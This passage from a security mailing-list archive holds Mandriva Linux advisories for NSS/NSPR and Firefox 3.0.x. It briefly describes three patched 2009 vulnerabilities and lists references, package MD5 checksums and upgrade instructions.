2009.1/x86_64/lib64nss-static-devel-3.12.3.1-0.1mdv2009.1.x86_64.rpm 5b74be3721f34c50f694e9fcefe6a473 2009.1/x86_64/nss-3.12.3.1-0.1mdv2009.1.x86_64.rpm 6ce5146371c4f730f89205041c8747c2 2009.1/SRPMS/nspr-4.7.5-0.1mdv2009.1.src.rpm 3b19dc2f4f2265516b39a194f32469ae 2009.1/SRPMS/nss-3.12.3.1-0.1mdv2009.1.src.rpm Mandriva Enterprise Server 5: 716f2bd75c87311db7f67a28de3ff280 mes5/i586/libnspr4-4.7.5-0.1mdvmes5.i586.rpm ded949730043e580c871f2cb5e79b0ec mes5/i586/libnspr-devel-4.7.5-0.1mdvmes5.i586.rpm 40233afde79f89595e5ac5d5d82978de mes5/i586/libnss3-3.12.3.1-0.1mdvmes5.i586.rpm db5845f7689f4a804c22fc1b526b63da mes5/i586/libnss-devel-3.12.3.1-0.1mdvmes5.i586.rpm 4b9feb67d67af798a2ebd6462cd6baca mes5/i586/libnss-static-devel-3.12.3.1-0.1mdvmes5.i586.rpm adc99fd98222f78b51f15c1882afe48c mes5/i586/nss-3.12.3.1-0.1mdvmes5.i586.rpm 9c427e46d75b1b960e89ae0bffece026 mes5/SRPMS/nspr-4.7.5-0.1mdvmes5.src.rpm 743e29fc78ccda2b72a12b9c44831401 mes5/SRPMS/nss-3.12.3.1-0.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: dc5310ab580fcc88b0ca7a3d0d9e0003 mes5/x86_64/lib64nspr4-4.7.5-0.1mdvmes5.x86_64.rpm d27ac59efb819ee6fa8fecb8a4285ae1 mes5/x86_64/lib64nspr-devel-4.7.5-0.1mdvmes5.x86_64.rpm 163da07011b8da2b83c0632c4535bf33 mes5/x86_64/lib64nss3-3.12.3.1-0.1mdvmes5.x86_64.rpm 2d3c6712c3a9997a3f866729736651e8 mes5/x86_64/lib64nss-devel-3.12.3.1-0.1mdvmes5.x86_64.rpm 974c5f16ce666817f6e851f8b3bfb339 mes5/x86_64/lib64nss-static-devel-3.12.3.1-0.1mdvmes5.x86_64.rpm 92b5732957ad6ea00d1635737d425874 mes5/x86_64/nss-3.12.3.1-0.1mdvmes5.x86_64.rpm 9c427e46d75b1b960e89ae0bffece026 mes5/SRPMS/nspr-4.7.5-0.1mdvmes5.src.rpm 743e29fc78ccda2b72a12b9c44831401 mes5/SRPMS/nss-3.12.3.1-0.1mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKfHeXmqjQ0CJFipgRAlkEAJ9FIspFN3yaMTZxo+XNMK1xyWFS5ACfR1CA YhYhKVCghHrxfRbmHQDhzQI= =cqmE -----END PGP SIGNATURE----- From security at mandriva.com Fri Aug 7 23:17:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Sat, 08 Aug 2009 00:17:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:198 ] firefox Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:198 http://www.mandriva.com/security/ _______________________________________________________________________ Package : firefox Date : August 7, 2009 Affected: 2009.0, 2009.1, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: Security issues were identified and fixed in firefox 3.0.x: Security researcher Juan Pablo Lopez Yacubian reported that an attacker could call window.open() on an invalid URL which looks similar to a legitimate URL and then use document.write() to place content within the new document, appearing to have come from the spoofed location (CVE-2009-2654). Moxie Marlinspike reported a heap overflow vulnerability in the code that handles regular expressions in certificate names. This vulnerability could be used to compromise the browser and run arbitrary code by presenting a specially crafted certificate to the client (CVE-2009-2404). IOActive security researcher Dan Kaminsky reported a mismatch in the treatment of domain names in SSL certificates between SSL clients and the Certificate Authorities (CA) which issue server certificates. These certificates could be used to intercept and potentially alter encrypted communication between the client and a server such as sensitive bank account transactions (CVE-2009-2408). This update provides the latest Mozilla Firefox 3.0.x to correct these issues. Additionally, some packages which require so, have been rebuilt and are being provided as updates. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2654 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2404 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408 http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.13 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: a6822ef829b5dc2a49155770fc10cc20 2009.0/i586/beagle-0.3.8-13.14mdv2009.0.i586.rpm 2db822d3c7e73ac60ad781499e6ec251 2009.0/i586/beagle-crawl-system-0.3.8-13.14mdv2009.0.i586.rpm b0441b626197cb5d6e3444a3d482e79a 2009.0/i586/beagle-doc-0.3.8-13.14mdv2009.0.i586.rpm 5672bbd66911b997af8c84dbf7751bb5 2009.0/i586/beagle-epiphany-0.3.8-13.14mdv2009.0.i586.rpm e45dce0afc5f79b3744923edbb45d527 2009.0/i586/beagle-evolution-0.3.8-13.14mdv2009.0.i586.rpm 15b7970e50d9f5c47ddbf6e21f2bd782 2009.0/i586/beagle-gui-0.3.8-13.14mdv2009.0.i586.rpm a23bca93271243b989ea7afa3e898aca 2009.0/i586/beagle-gui-qt-0.3.8-13.14mdv2009.0.i586.rpm 9be046a4ddc0162ba1511715e08802ff 2009.0/i586/beagle-libs-0.3.8-13.14mdv2009.0.i586.rpm 2d60bf05386502d9fbb550f0bac1331b 2009.0/i586/devhelp-0.21-3.9mdv2009.0.i586.rpm 6bb27bb53d3bda021ceed7710d195338 2009.0/i586/devhelp-plugins-0.21-3.9mdv2009.0.i586.rpm 96e1d0f9d5c46a61a69c8a160285c92f 2009.0/i586/epiphany-2.24.0.1-3.11mdv2009.0.i586.rpm 36a0963341309cf3d0decf116c1a2668 2009.0/i586/epiphany-devel-2.24.0.1-3.11mdv2009.0.i586.rpm fef5d1610ade943011b36a0482e9043d 2009.0/i586/firefox-3.0.13-0.1mdv2009.0.i586.rpm 374b38801f273b8714be2782ac2e37c1 2009.0/i586/firefox-af-3.0.13-0.1mdv2009.0.i586.rpm f981898248d140a9b91619a690055c6f 2009.0/i586/firefox-ar-3.0.13-0.1mdv2009.0.i586.rpm cf01b3a96527899aad4f323c042c3ade 2009.0/i586/firefox-be-3.0.13-0.1mdv2009.0.i586.rpm 6fa86a03cb638ff49a28ac1073917df1 2009.0/i586/firefox-bg-3.0.13-0.1mdv2009.0.i586.rpm 089fda6b705c8a9abd994c819058f1c8 2009.0/i586/firefox-bn-3.0.13-0.1mdv2009.0.i586.rpm 8543e4eae4ce95e6eb32813bc1bc01fc 2009.0/i586/firefox-ca-3.0.13-0.1mdv2009.0.i586.rpm 4722b78b978a9f82de71d56fa0274ad4 2009.0/i586/firefox-cs-3.0.13-0.1mdv2009.0.i586.rpm 595d817763c4901c47b0ef479bd01bcc 2009.0/i586/firefox-cy-3.0.13-0.1mdv2009.0.i586.rpm 9bc25a5210fe99d2ba4d4b85e9018213 2009.0/i586/firefox-da-3.0.13-0.1mdv2009.0.i586.rpm e6fc11edfe7b86f04455b3dc7e4bd65e 2009.0/i586/firefox-de-3.0.13-0.1mdv2009.0.i586.rpm 9afa4c1062e91163756ef5109ff51187 2009.0/i586/firefox-el-3.0.13-0.1mdv2009.0.i586.rpm f75831ec921046c0dca1e13e34780c83 2009.0/i586/firefox-en_GB-3.0.13-0.1mdv2009.0.i586.rpm c58608f0789bdef53d1e89395fedf49f 2009.0/i586/firefox-eo-3.0.13-0.1mdv2009.0.i586.rpm 214574c3c5d82fe477ba0f50f63fd9fa 2009.0/i586/firefox-es_AR-3.0.13-0.1mdv2009.0.i586.rpm 658464fc37af0c06fffa759d037baceb 2009.0/i586/firefox-es_ES-3.0.13-0.1mdv2009.0.i586.rpm c5e764ad2738116d30343c0b38a962fa 2009.0/i586/firefox-et-3.0.13-0.1mdv2009.0.i586.rpm 8fb89898a68072bf7265c69d43410493 2009.0/i586/firefox-eu-3.0.13-0.1mdv2009.0.i586.rpm 3f361372c29fe95009dbd1078db64f65 2009.0/i586/firefox-ext-beagle-0.3.8-13.14mdv2009.0.i586.rpm 91464a6f25b8ea8c0d48de5cb0416740 2009.0/i586/firefox-ext-mozvoikko-0.9.5-4.9mdv2009.0.i586.rpm 9bc38cbec9d19bf568e6e9a89830a28f 2009.0/i586/firefox-fi-3.0.13-0.1mdv2009.0.i586.rpm 6dd78364bea9831ef0b3aa14f2d0118c 2009.0/i586/firefox-fr-3.0.13-0.1mdv2009.0.i586.rpm 180d5bfe08d234f02b1de34ca5654958 2009.0/i586/firefox-fy-3.0.13-0.1mdv2009.0.i586.rpm e4c18944adb12682655a90ee2faad97b 2009.0/i586/firefox-ga_IE-3.0.13-0.1mdv2009.0.i586.rpm 90b228a4010794165de329652ebbee25 2009.0/i586/firefox-gl-3.0.13-0.1mdv2009.0.i586.rpm f0586fdecb33249427065357a6e92d60 2009.0/i586/firefox-gu_IN-3.0.13-0.1mdv2009.0.i586.rpm 7bfc4a6196e2969a1cbae8d0f17f6ad1 2009.0/i586/firefox-he-3.0.13-0.1mdv2009.0.i586.rpm cca307fc57f277189b4d2bd8d7368abb 2009.0/i586/firefox-hi-3.0.13-0.1mdv2009.0.i586.rpm 052636e93f9576602a6d8876d19d8fc4 2009.0/i586/firefox-hu-3.0.13-0.1mdv2009.0.i586.rpm 899eeeca6c5305ce42fac890ae25acf4 2009.0/i586/firefox-id-3.0.13-0.1mdv2009.0.i586.rpm 876435ef3c302f94c8ce1cab6ec54e3e 2009.0/i586/firefox-is-3.0.13-0.1mdv2009.0.i586.rpm 9a663ac414779e841fa9e0b0de849e33 2009.0/i586/firefox-it-3.0.13-0.1mdv2009.0.i586.rpm 408453053f2dd0d238af016cb4e77237 2009.0/i586/firefox-ja-3.0.13-0.1mdv2009.0.i586.rpm cb0ab9447c1a5c439d1ede480c0f7835 2009.0/i586/firefox-ka-3.0.13-0.1mdv2009.0.i586.rpm 8fc83bc333676e38e3efd9b609fd674b 2009.0/i586/firefox-kn-3.0.13-0.1mdv2009.0.i586.rpm 612bb5fb598e61fb5802ff85708e6a5a 2009.0/i586/firefox-ko-3.0.13-0.1mdv2009.0.i586.rpm ac2312f1d74c268a72a4b4d3a4219ef1 2009.0/i586/firefox-ku-3.0.13-0.1mdv2009.0.i586.rpm 154dbc2ba6e46f5aa3ef99b66ec36a51 2009.0/i586/firefox-lt-3.0.13-0.1mdv2009.0.i586.rpm ecd25bc2d1e9cde62e0be85071c64529 2009.0/i586/firefox-lv-3.0.13-0.1mdv2009.0.i586.rpm 15f3d5c9a3a73a982c0c6351bb110271 2009.0/i586/firefox-mk-3.0.13-0.1mdv2009.0.i586.rpm 2b558113cd766e13056b99c48201f89b 2009.0/i586/firefox-mn-3.0.13-0.1mdv2009.0.i586.rpm 79f2fa3996f7b4f1779c6fa8f1a4543c 2009.0/i586/firefox-mr-3.0.13-0.1mdv2009.0.i586.rpm 8e73487dad85ffa6be02c17cc828beaa 2009.0/i586/firefox-nb_NO-3.0.13-0.1mdv2009.0.i586.rpm 366f85aa9ea20fcec1fef63b5a1f1df1 2009.0/i586/firefox-nl-3.0.13-0.1mdv2009.0.i586.rpm 43dca1cbb4ab3691cabf5cd74ffaf2b3 2009.0/i586/firefox-nn_NO-3.0.13-0.1mdv2009.0.i586.rpm 213f3e46bcfec9f7765569f4d004364a 2009.0/i586/firefox-oc-3.0.13-0.1mdv2009.0.i586.rpm d619b6e5f78f7f4bb0c60d19ceb7e876 2009.0/i586/firefox-pa_IN-3.0.13-0.1mdv2009.0.i586.rpm faf4b1e079c68e5697292fbdba30ebf1 2009.0/i586/firefox-pl-3.0.13-0.1mdv2009.0.i586.rpm 7d15b1990732f451bcfac1c1a7b77978 2009.0/i586/firefox-pt_BR-3.0.13-0.1mdv2009.0.i586.rpm c8b133b74d0eb2d3dec671a0c1f6bc86 2009.0/i586/firefox-pt_PT-3.0.13-0.1mdv2009.0.i586.rpm 4ece2c2e4e9fc0b25c8fb3287ec0b9af 2009.0/i586/firefox-ro-3.0.13-0.1mdv2009.0.i586.rpm f5ecba21ec0b359c057f378583b4279f 2009.0/i586/firefox-ru-3.0.13-0.1mdv2009.0.i586.rpm 4e64f4151cbcae1f498538d193cece9a 2009.0/i586/firefox-si-3.0.13-0.1mdv2009.0.i586.rpm 7989e3ec7fe2878ce4c334562aff9767 2009.0/i586/firefox-sk-3.0.13-0.1mdv2009.0.i586.rpm 7a117b88ad2206d9eda81ca884cbb385 2009.0/i586/firefox-sl-3.0.13-0.1mdv2009.0.i586.rpm 2d4d85a8e07af571c9c7e331de3be317 2009.0/i586/firefox-sq-3.0.13-0.1mdv2009.0.i586.rpm afc3cae145b8a5bce558aacbc0fdbfd1 2009.0/i586/firefox-sr-3.0.13-0.1mdv2009.0.i586.rpm a41f83c5f17482e24d113d7bee667984 2009.0/i586/firefox-sv_SE-3.0.13-0.1mdv2009.0.i586.rpm dc28d7e7746f1e95a25cb1e450c9619b 2009.0/i586/firefox-te-3.0.13-0.1mdv2009.0.i586.rpm f84f2d826d15843192a0f4b98e064547 2009.0/i586/firefox-th-3.0.13-0.1mdv2009.0.i586.rpm 1142168ff446e1a5f89be897815678b4 2009.0/i586/firefox-theme-kde4ff-0.14-4.9mdv2009.0.i586.rpm 0f8593cacdb0c3ee674c95ffcbc330fe 2009.0/i586/firefox-tr-3.0.13-0.1mdv2009.0.i586.rpm 69b5d73b3809140ab15c884cd75fc98f 2009.0/i586/firefox-uk-3.0.13-0.1mdv2009.0.i586.rpm e334049f5692cabfaedbe2c194b51202 2009.0/i586/firefox-zh_CN-3.0.13-0.1mdv2009.0.i586.rpm 2958cb63c8593fd8b8f1f68c8dde0905 2009.0/i586/firefox-zh_TW-3.0.13-0.1mdv2009.0.i586.rpm 7cda89f8cc627a59b61b976717be30d6 2009.0/i586/gnome-python-extras-2.19.1-20.9mdv2009.0.i586.rpm 576557a3a514f71933cb8a9c707ceb30 2009.0/i586/gnome-python-gda-2.19.1-20.9mdv2009.0.i586.rpm 976a8cff0d00126d7e4a807a8f879a54 2009.0/i586/gnome-python-gda-devel-2.19.1-20.9mdv2009.0.i586.rpm 3d2424b8c8cab0668d691ebd947dd605 2009.0/i586/gnome-python-gdl-2.19.1-20.9mdv2009.0.i586.rpm 2e71485c4eca0038d61f4508926f7fa4 2009.0/i586/gnome-python-gtkhtml2-2.19.1-20.9mdv2009.0.i586.rpm 5c1f92354d07da9682210eeb87825eb5 2009.0/i586/gnome-python-gtkmozembed-2.19.1-20.9mdv2009.0.i586.rpm f04444a67896b048d7a84ed20357feed 2009.0/i586/gnome-python-gtkspell-2.19.1-20.9mdv2009.0.i586.rpm 016f5cc2ec1a06598277a5b6be5efa2c 2009.0/i586/libdevhelp-1_0-0.21-3.9mdv2009.0.i586.rpm 1142e65abf94dac2b1b318bcea82bf5c 2009.0/i586/libdevhelp-1-devel-0.21-3.9mdv2009.0.i586.rpm 67d3d4ac04921885af224a9c70e87ae8 2009.0/i586/libxulrunner1.9-1.9.0.13-0.1mdv2009.0.i586.rpm af1331867d259d913a07f862a4079ee2 2009.0/i586/libxulrunner-devel-1.9.0.13-0.1mdv2009.0.i586.rpm 0bd0a103a85b8e8d4eaaac6dc5397867 2009.0/i586/libxulrunner-unstable-devel-1.9.0.13-0.1mdv2009.0.i586.rpm 0ec2c94351bc2f0c510721f09ea461b7 2009.0/i586/mozilla-firefox-ext-blogrovr-1.1.779-5.9mdv2009.0.i586.rpm 37647fc015fa5559d6c77bb9e7321bfb 2009.0/i586/mozilla-firefox-ext-foxmarks-2.1.0.12-2.9mdv2009.0.i586.rpm 2a89f46e141a1bc4218ce5f2dde00c1e 2009.0/i586/mozilla-firefox-ext-scribefire-2.3.1-2.9mdv2009.0.i586.rpm 914bcd8fb4c05239c2bdd162232a6ba3 2009.0/i586/mozilla-thunderbird-beagle-0.3.8-13.14mdv2009.0.i586.rpm 88e16f7cb5be2fc9fa83902ecafa19a6 2009.0/i586/xulrunner-1.9.0.13-0.1mdv2009.0.i586.rpm 4356ef867793688f2fde896a9d542057 2009.0/i586/yelp-2.24.0-3.9mdv2009.0.i586.rpm 4878f8a0366b18e8a8744eb21db1a2b7 2009.0/SRPMS/beagle-0.3.8-13.14mdv2009.0.src.rpm 08aea1f09ea4ad62af093a52b708a9ce 2009.0/SRPMS/devhelp-0.21-3.9mdv2009.0.src.rpm 25baa2313d08362d5e5187f5e6d7e3f7 2009.0/SRPMS/epiphany-2.24.0.1-3.11mdv2009.0.src.rpm ce2aec03351fffffc8362873bdac68a4 2009.0/SRPMS/firefox-3.0.13-0.1mdv2009.0.src.rpm b14c2fc2c59f7a0a8583f7239a9103cb 2009.0/SRPMS/firefox-ext-mozvoikko-0.9.5-4.9mdv2009.0.src.rpm 11abbad498571ed3951c668da59f2c91 2009.0/SRPMS/firefox-l10n-3.0.13-0.1mdv2009.0.src.rpm 8ada83f445f97ebb7951236b59541cbe 2009.0/SRPMS/firefox-theme-kde4ff-0.14-4.9mdv2009.0.src.rpm 1d8d443e6063def0818214d0ce315bcd 2009.0/SRPMS/gnome-python-extras-2.19.1-20.9mdv2009.0.src.rpm 18e8a4e1f7d1fca89cb6be0d21c1016f 2009.0/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-5.9mdv2009.0.src.rpm 3b194e6cc23a43e9f324f37f9a820e4e 2009.0/SRPMS/mozilla-firefox-ext-foxmarks-2.1.0.12-2.9mdv2009.0.src.rpm 6b8e5bee3849011f725248817b501706 2009.0/SRPMS/mozilla-firefox-ext-scribefire-2.3.1-2.9mdv2009.0.src.rpm 34efe4f4d585db58b769de32eed31b14 2009.0/SRPMS/xulrunner-1.9.0.13-0.1mdv2009.0.src.rpm cafe5ac9664e7f54035fed9d17921c94 2009.0/SRPMS/yelp-2.24.0-3.9mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: fd2a9ff60f4e68f4a481a5fe4a98c73a 2009.0/x86_64/beagle-0.3.8-13.14mdv2009.0.x86_64.rpm 9b1d89b08f16e56768fd9542079f350d 2009.0/x86_64/beagle-crawl-system-0.3.8-13.14mdv2009.0.x86_64.rpm 6373aacafa1057af4684db790962e7ae 2009.0/x86_64/beagle-doc-0.3.8-13.14mdv2009.0.x86_64.rpm 4192fedb81ce69831e74fe6d3d93959f 2009.0/x86_64/beagle-epiphany-0.3.8-13.14mdv2009.0.x86_64.rpm 24e885319c5d9dfc9184d087dffc3f99 2009.0/x86_64/beagle-evolution-0.3.8-13.14mdv2009.0.x86_64.rpm 852adea7f93e3199a0f0c8843e7c55a8 2009.0/x86_64/beagle-gui-0.3.8-13.14mdv2009.0.x86_64.rpm fc485f7767ad85e2c026c404075d9229 2009.0/x86_64/beagle-gui-qt-0.3.8-13.14mdv2009.0.x86_64.rpm 07bb1b9c24c9f88ff8437d2c1b75878b 2009.0/x86_64/beagle-libs-0.3.8-13.14mdv2009.0.x86_64.rpm 092f8d36c077ff5d697d217156aca03a 2009.0/x86_64/devhelp-0.21-3.9mdv2009.0.x86_64.rpm a5101c919b946b770d14a049d788e8d9 2009.0/x86_64/devhelp-plugins-0.21-3.9mdv2009.0.x86_64.rpm 3d37811d58eabd343432f0bd79da93f9 2009.0/x86_64/epiphany-2.24.0.1-3.11mdv2009.0.x86_64.rpm 8bf41b3ccff1bbf6b517ddb43c65f3d4 2009.0/x86_64/epiphany-devel-2.24.0.1-3.11mdv2009.0.x86_64.rpm 90b2602358cda40b9b77ecf43d8a5813 2009.0/x86_64/firefox-3.0.13-0.1mdv2009.0.x86_64.rpm c802e7ce61f1c6db1861e1ad8625db58 2009.0/x86_64/firefox-af-3.0.13-0.1mdv2009.0.x86_64.rpm 26efc3eb99d920565bbecc31c5b29d2c 2009.0/x86_64/firefox-ar-3.0.13-0.1mdv2009.0.x86_64.rpm 5da83501fc42740dfca0a6b362e8e332 2009.0/x86_64/firefox-be-3.0.13-0.1mdv2009.0.x86_64.rpm 51267ac84ea3a0745f0229d4c379e591 2009.0/x86_64/firefox-bg-3.0.13-0.1mdv2009.0.x86_64.rpm 6ddce5aa96b508a7241526e00e78e393 2009.0/x86_64/firefox-bn-3.0.13-0.1mdv2009.0.x86_64.rpm 10c1b53854b08c634e853b8fc4fbbe74 2009.0/x86_64/firefox-ca-3.0.13-0.1mdv2009.0.x86_64.rpm 6f12ccc92981d70dbedeb8f99ac552e1 2009.0/x86_64/firefox-cs-3.0.13-0.1mdv2009.0.x86_64.rpm a0a79dd3c0984ee03834e06e44c6b632 2009.0/x86_64/firefox-cy-3.0.13-0.1mdv2009.0.x86_64.rpm 4fafa1c0616047cd355e9ce4621b964b 2009.0/x86_64/firefox-da-3.0.13-0.1mdv2009.0.x86_64.rpm 8b89533b107bcac1454e636d4bfdbb01 2009.0/x86_64/firefox-de-3.0.13-0.1mdv2009.0.x86_64.rpm 60ed34b007aef6983f7567df8e5aa360 2009.0/x86_64/firefox-el-3.0.13-0.1mdv2009.0.x86_64.rpm ae965aac1eaaecd6642a5926c221bcde 2009.0/x86_64/firefox-en_GB-3.0.13-0.1mdv2009.0.x86_64.rpm 6df13fe269bc57cc42c94da2401def6d 2009.0/x86_64/firefox-eo-3.0.13-0.1mdv2009.0.x86_64.rpm 9d39eed36e33728f5a4d1cd629fcdc22 2009.0/x86_64/firefox-es_AR-3.0.13-0.1mdv2009.0.x86_64.rpm f1f19bb222e2d5b2343535eab2beb94e 2009.0/x86_64/firefox-es_ES-3.0.13-0.1mdv2009.0.x86_64.rpm 68eef6bc4021590584cb6fb1e137b1bd 2009.0/x86_64/firefox-et-3.0.13-0.1mdv2009.0.x86_64.rpm 54bc429f2eb350b2c94b4ecc776bfb8f 2009.0/x86_64/firefox-eu-3.0.13-0.1mdv2009.0.x86_64.rpm a4477742a5a74668cc72c9eda39ababa 2009.0/x86_64/firefox-ext-beagle-0.3.8-13.14mdv2009.0.x86_64.rpm 6fdda4fcd02eff82a5fedbc0e7db4a89 2009.0/x86_64/firefox-ext-mozvoikko-0.9.5-4.9mdv2009.0.x86_64.rpm 9138b808592bcf06e9cd6f0a58676c24 2009.0/x86_64/firefox-fi-3.0.13-0.1mdv2009.0.x86_64.rpm e8f9c8ea5248d400af9be21771195b66 2009.0/x86_64/firefox-fr-3.0.13-0.1mdv2009.0.x86_64.rpm 226c770c9eb371a9cd66747b3cad6828 2009.0/x86_64/firefox-fy-3.0.13-0.1mdv2009.0.x86_64.rpm 2260fcea15a9cc49b347390cadc71599 2009.0/x86_64/firefox-ga_IE-3.0.13-0.1mdv2009.0.x86_64.rpm f7a0c391873545dbb25c810ba12fe164 2009.0/x86_64/firefox-gl-3.0.13-0.1mdv2009.0.x86_64.rpm 32f993a35c46dcf8e25e39929b1ced2a 2009.0/x86_64/firefox-gu_IN-3.0.13-0.1mdv2009.0.x86_64.rpm 2e4a73d19ccfcb20092160a6d5941e97 2009.0/x86_64/firefox-he-3.0.13-0.1mdv2009.0.x86_64.rpm 160666a1e608cff7401b43eed7f90535 2009.0/x86_64/firefox-hi-3.0.13-0.1mdv2009.0.x86_64.rpm b70b2c5f7af2cc81174f91cd31a1493c 2009.0/x86_64/firefox-hu-3.0.13-0.1mdv2009.0.x86_64.rpm 74fca931bba785ac47b7aa181494cdbb 2009.0/x86_64/firefox-id-3.0.13-0.1mdv2009.0.x86_64.rpm 3fe8638b5170b72917e4e8ea1174e17b 2009.0/x86_64/firefox-is-3.0.13-0.1mdv2009.0.x86_64.rpm 3f139ac3e9c365c8f693aba837e2a042 2009.0/x86_64/firefox-it-3.0.13-0.1mdv2009.0.x86_64.rpm f7b678a1bfbefda814fa83306222cc41 2009.0/x86_64/firefox-ja-3.0.13-0.1mdv2009.0.x86_64.rpm 7e939898258c08a317a36e07273ea209 2009.0/x86_64/firefox-ka-3.0.13-0.1mdv2009.0.x86_64.rpm 8882bfae1b24b58ff494f82415681987 2009.0/x86_64/firefox-kn-3.0.13-0.1mdv2009.0.x86_64.rpm 44fa31c02c81eaa8ae61bdcfbae64367 2009.0/x86_64/firefox-ko-3.0.13-0.1mdv2009.0.x86_64.rpm 2e072ba6d9650eea364a31eda816f11d 2009.0/x86_64/firefox-ku-3.0.13-0.1mdv2009.0.x86_64.rpm 36430330e9038c09c8d43c4cb448371e 2009.0/x86_64/firefox-lt-3.0.13-0.1mdv2009.0.x86_64.rpm 3ab6cc70b68e10bfd62cdfa896099eba 2009.0/x86_64/firefox-lv-3.0.13-0.1mdv2009.0.x86_64.rpm 3ed08b83e37d5b6e504dff1f8f716225 2009.0/x86_64/firefox-mk-3.0.13-0.1mdv2009.0.x86_64.rpm 7c392f1ece949f2cb44f980bd01e7f05 2009.0/x86_64/firefox-mn-3.0.13-0.1mdv2009.0.x86_64.rpm de1dff9b9089b68d57a98ddd4980b0a2 2009.0/x86_64/firefox-mr-3.0.13-0.1mdv2009.0.x86_64.rpm 05944f1a699c48a0ed982ec3d3f393c4 2009.0/x86_64/firefox-nb_NO-3.0.13-0.1mdv2009.0.x86_64.rpm f0cdec74711099dea77e948d5e41049e 2009.0/x86_64/firefox-nl-3.0.13-0.1mdv2009.0.x86_64.rpm f4a14720d7a2aea5cfd72fc6730d2434 2009.0/x86_64/firefox-nn_NO-3.0.13-0.1mdv2009.0.x86_64.rpm 16d2232a8ea403853c98628d15f6cb56 2009.0/x86_64/firefox-oc-3.0.13-0.1mdv2009.0.x86_64.rpm 80887101785cce0cc2e6a27b20b41f60 2009.0/x86_64/firefox-pa_IN-3.0.13-0.1mdv2009.0.x86_64.rpm 701e26b5086b1d7d7e48e9c331ea9089 2009.0/x86_64/firefox-pl-3.0.13-0.1mdv2009.0.x86_64.rpm 6488b668d9adf9838ed5f99008bd1b4a 2009.0/x86_64/firefox-pt_BR-3.0.13-0.1mdv2009.0.x86_64.rpm 6c84cd88d4a0cef254c31f976a800935 2009.0/x86_64/firefox-pt_PT-3.0.13-0.1mdv2009.0.x86_64.rpm 636373ef3a086dab553648f83d482279 2009.0/x86_64/firefox-ro-3.0.13-0.1mdv2009.0.x86_64.rpm d6c65eba5659c9d149fb74aecd0811e3 2009.0/x86_64/firefox-ru-3.0.13-0.1mdv2009.0.x86_64.rpm 59499f35ccbf4fbc6e30b4b543808591 2009.0/x86_64/firefox-si-3.0.13-0.1mdv2009.0.x86_64.rpm 4055dc544ead5676a9f2722cc7de0194 2009.0/x86_64/firefox-sk-3.0.13-0.1mdv2009.0.x86_64.rpm caeb6cab946ba48c1a20a78f037ef2a4 2009.0/x86_64/firefox-sl-3.0.13-0.1mdv2009.0.x86_64.rpm 0bd2025f89f1a9f0f3ad440301b97e8e 2009.0/x86_64/firefox-sq-3.0.13-0.1mdv2009.0.x86_64.rpm 8fb7c0a27aad0d260dc578d5bb1edc12 2009.0/x86_64/firefox-sr-3.0.13-0.1mdv2009.0.x86_64.rpm 86cee077f57a2d01f82a57f0551fdaa9 2009.0/x86_64/firefox-sv_SE-3.0.13-0.1mdv2009.0.x86_64.rpm 197fb3cce50e96251dd25343c702e672 2009.0/x86_64/firefox-te-3.0.13-0.1mdv2009.0.x86_64.rpm 55de6243da14129f9c1920d1c10899c4 2009.0/x86_64/firefox-th-3.0.13-0.1mdv2009.0.x86_64.rpm 56e8da997a82e1e372f90a3e98223cc4 2009.0/x86_64/firefox-theme-kde4ff-0.14-4.9mdv2009.0.x86_64.rpm 6de08168f2bb62e24f8ee8cbebcd1e06 2009.0/x86_64/firefox-tr-3.0.13-0.1mdv2009.0.x86_64.rpm d52c8d02969da364f8863b148e31172d 2009.0/x86_64/firefox-uk-3.0.13-0.1mdv2009.0.x86_64.rpm a69b955bd947ae79203e14f19947a4be 2009.0/x86_64/firefox-zh_CN-3.0.13-0.1mdv2009.0.x86_64.rpm bfa84035e496517b0c750f904896e021 2009.0/x86_64/firefox-zh_TW-3.0.13-0.1mdv2009.0.x86_64.rpm 5f4c007fe54fdd6e306c0bc6a32ce055 2009.0/x86_64/gnome-python-extras-2.19.1-20.9mdv2009.0.x86_64.rpm 17063d1f6fa264a64488e8085ffbfdfd 2009.0/x86_64/gnome-python-gda-2.19.1-20.9mdv2009.0.x86_64.rpm d83b5300a513aa8339ffa20663c8ac42 2009.0/x86_64/gnome-python-gda-devel-2.19.1-20.9mdv2009.0.x86_64.rpm 06d7f3eb117b4d9e4f84b910433325cf 2009.0/x86_64/gnome-python-gdl-2.19.1-20.9mdv2009.0.x86_64.rpm f5307d98cee90a569f425d64050d2dc6 2009.0/x86_64/gnome-python-gtkhtml2-2.19.1-20.9mdv2009.0.x86_64.rpm 233d7ba8094c84e9e9823c960a2fd180 2009.0/x86_64/gnome-python-gtkmozembed-2.19.1-20.9mdv2009.0.x86_64.rpm 897c01afbe582c23762a657f5b51f4f0 2009.0/x86_64/gnome-python-gtkspell-2.19.1-20.9mdv2009.0.x86_64.rpm 7f3c87d9e9252afb547d799d1d6d8842 2009.0/x86_64/lib64devhelp-1_0-0.21-3.9mdv2009.0.x86_64.rpm 93194f771048027535174c69313c2834 2009.0/x86_64/lib64devhelp-1-devel-0.21-3.9mdv2009.0.x86_64.rpm 364b6ddc466dc4ff461226e6294a9228 2009.0/x86_64/lib64xulrunner1.9-1.9.0.13-0.1mdv2009.0.x86_64.rpm 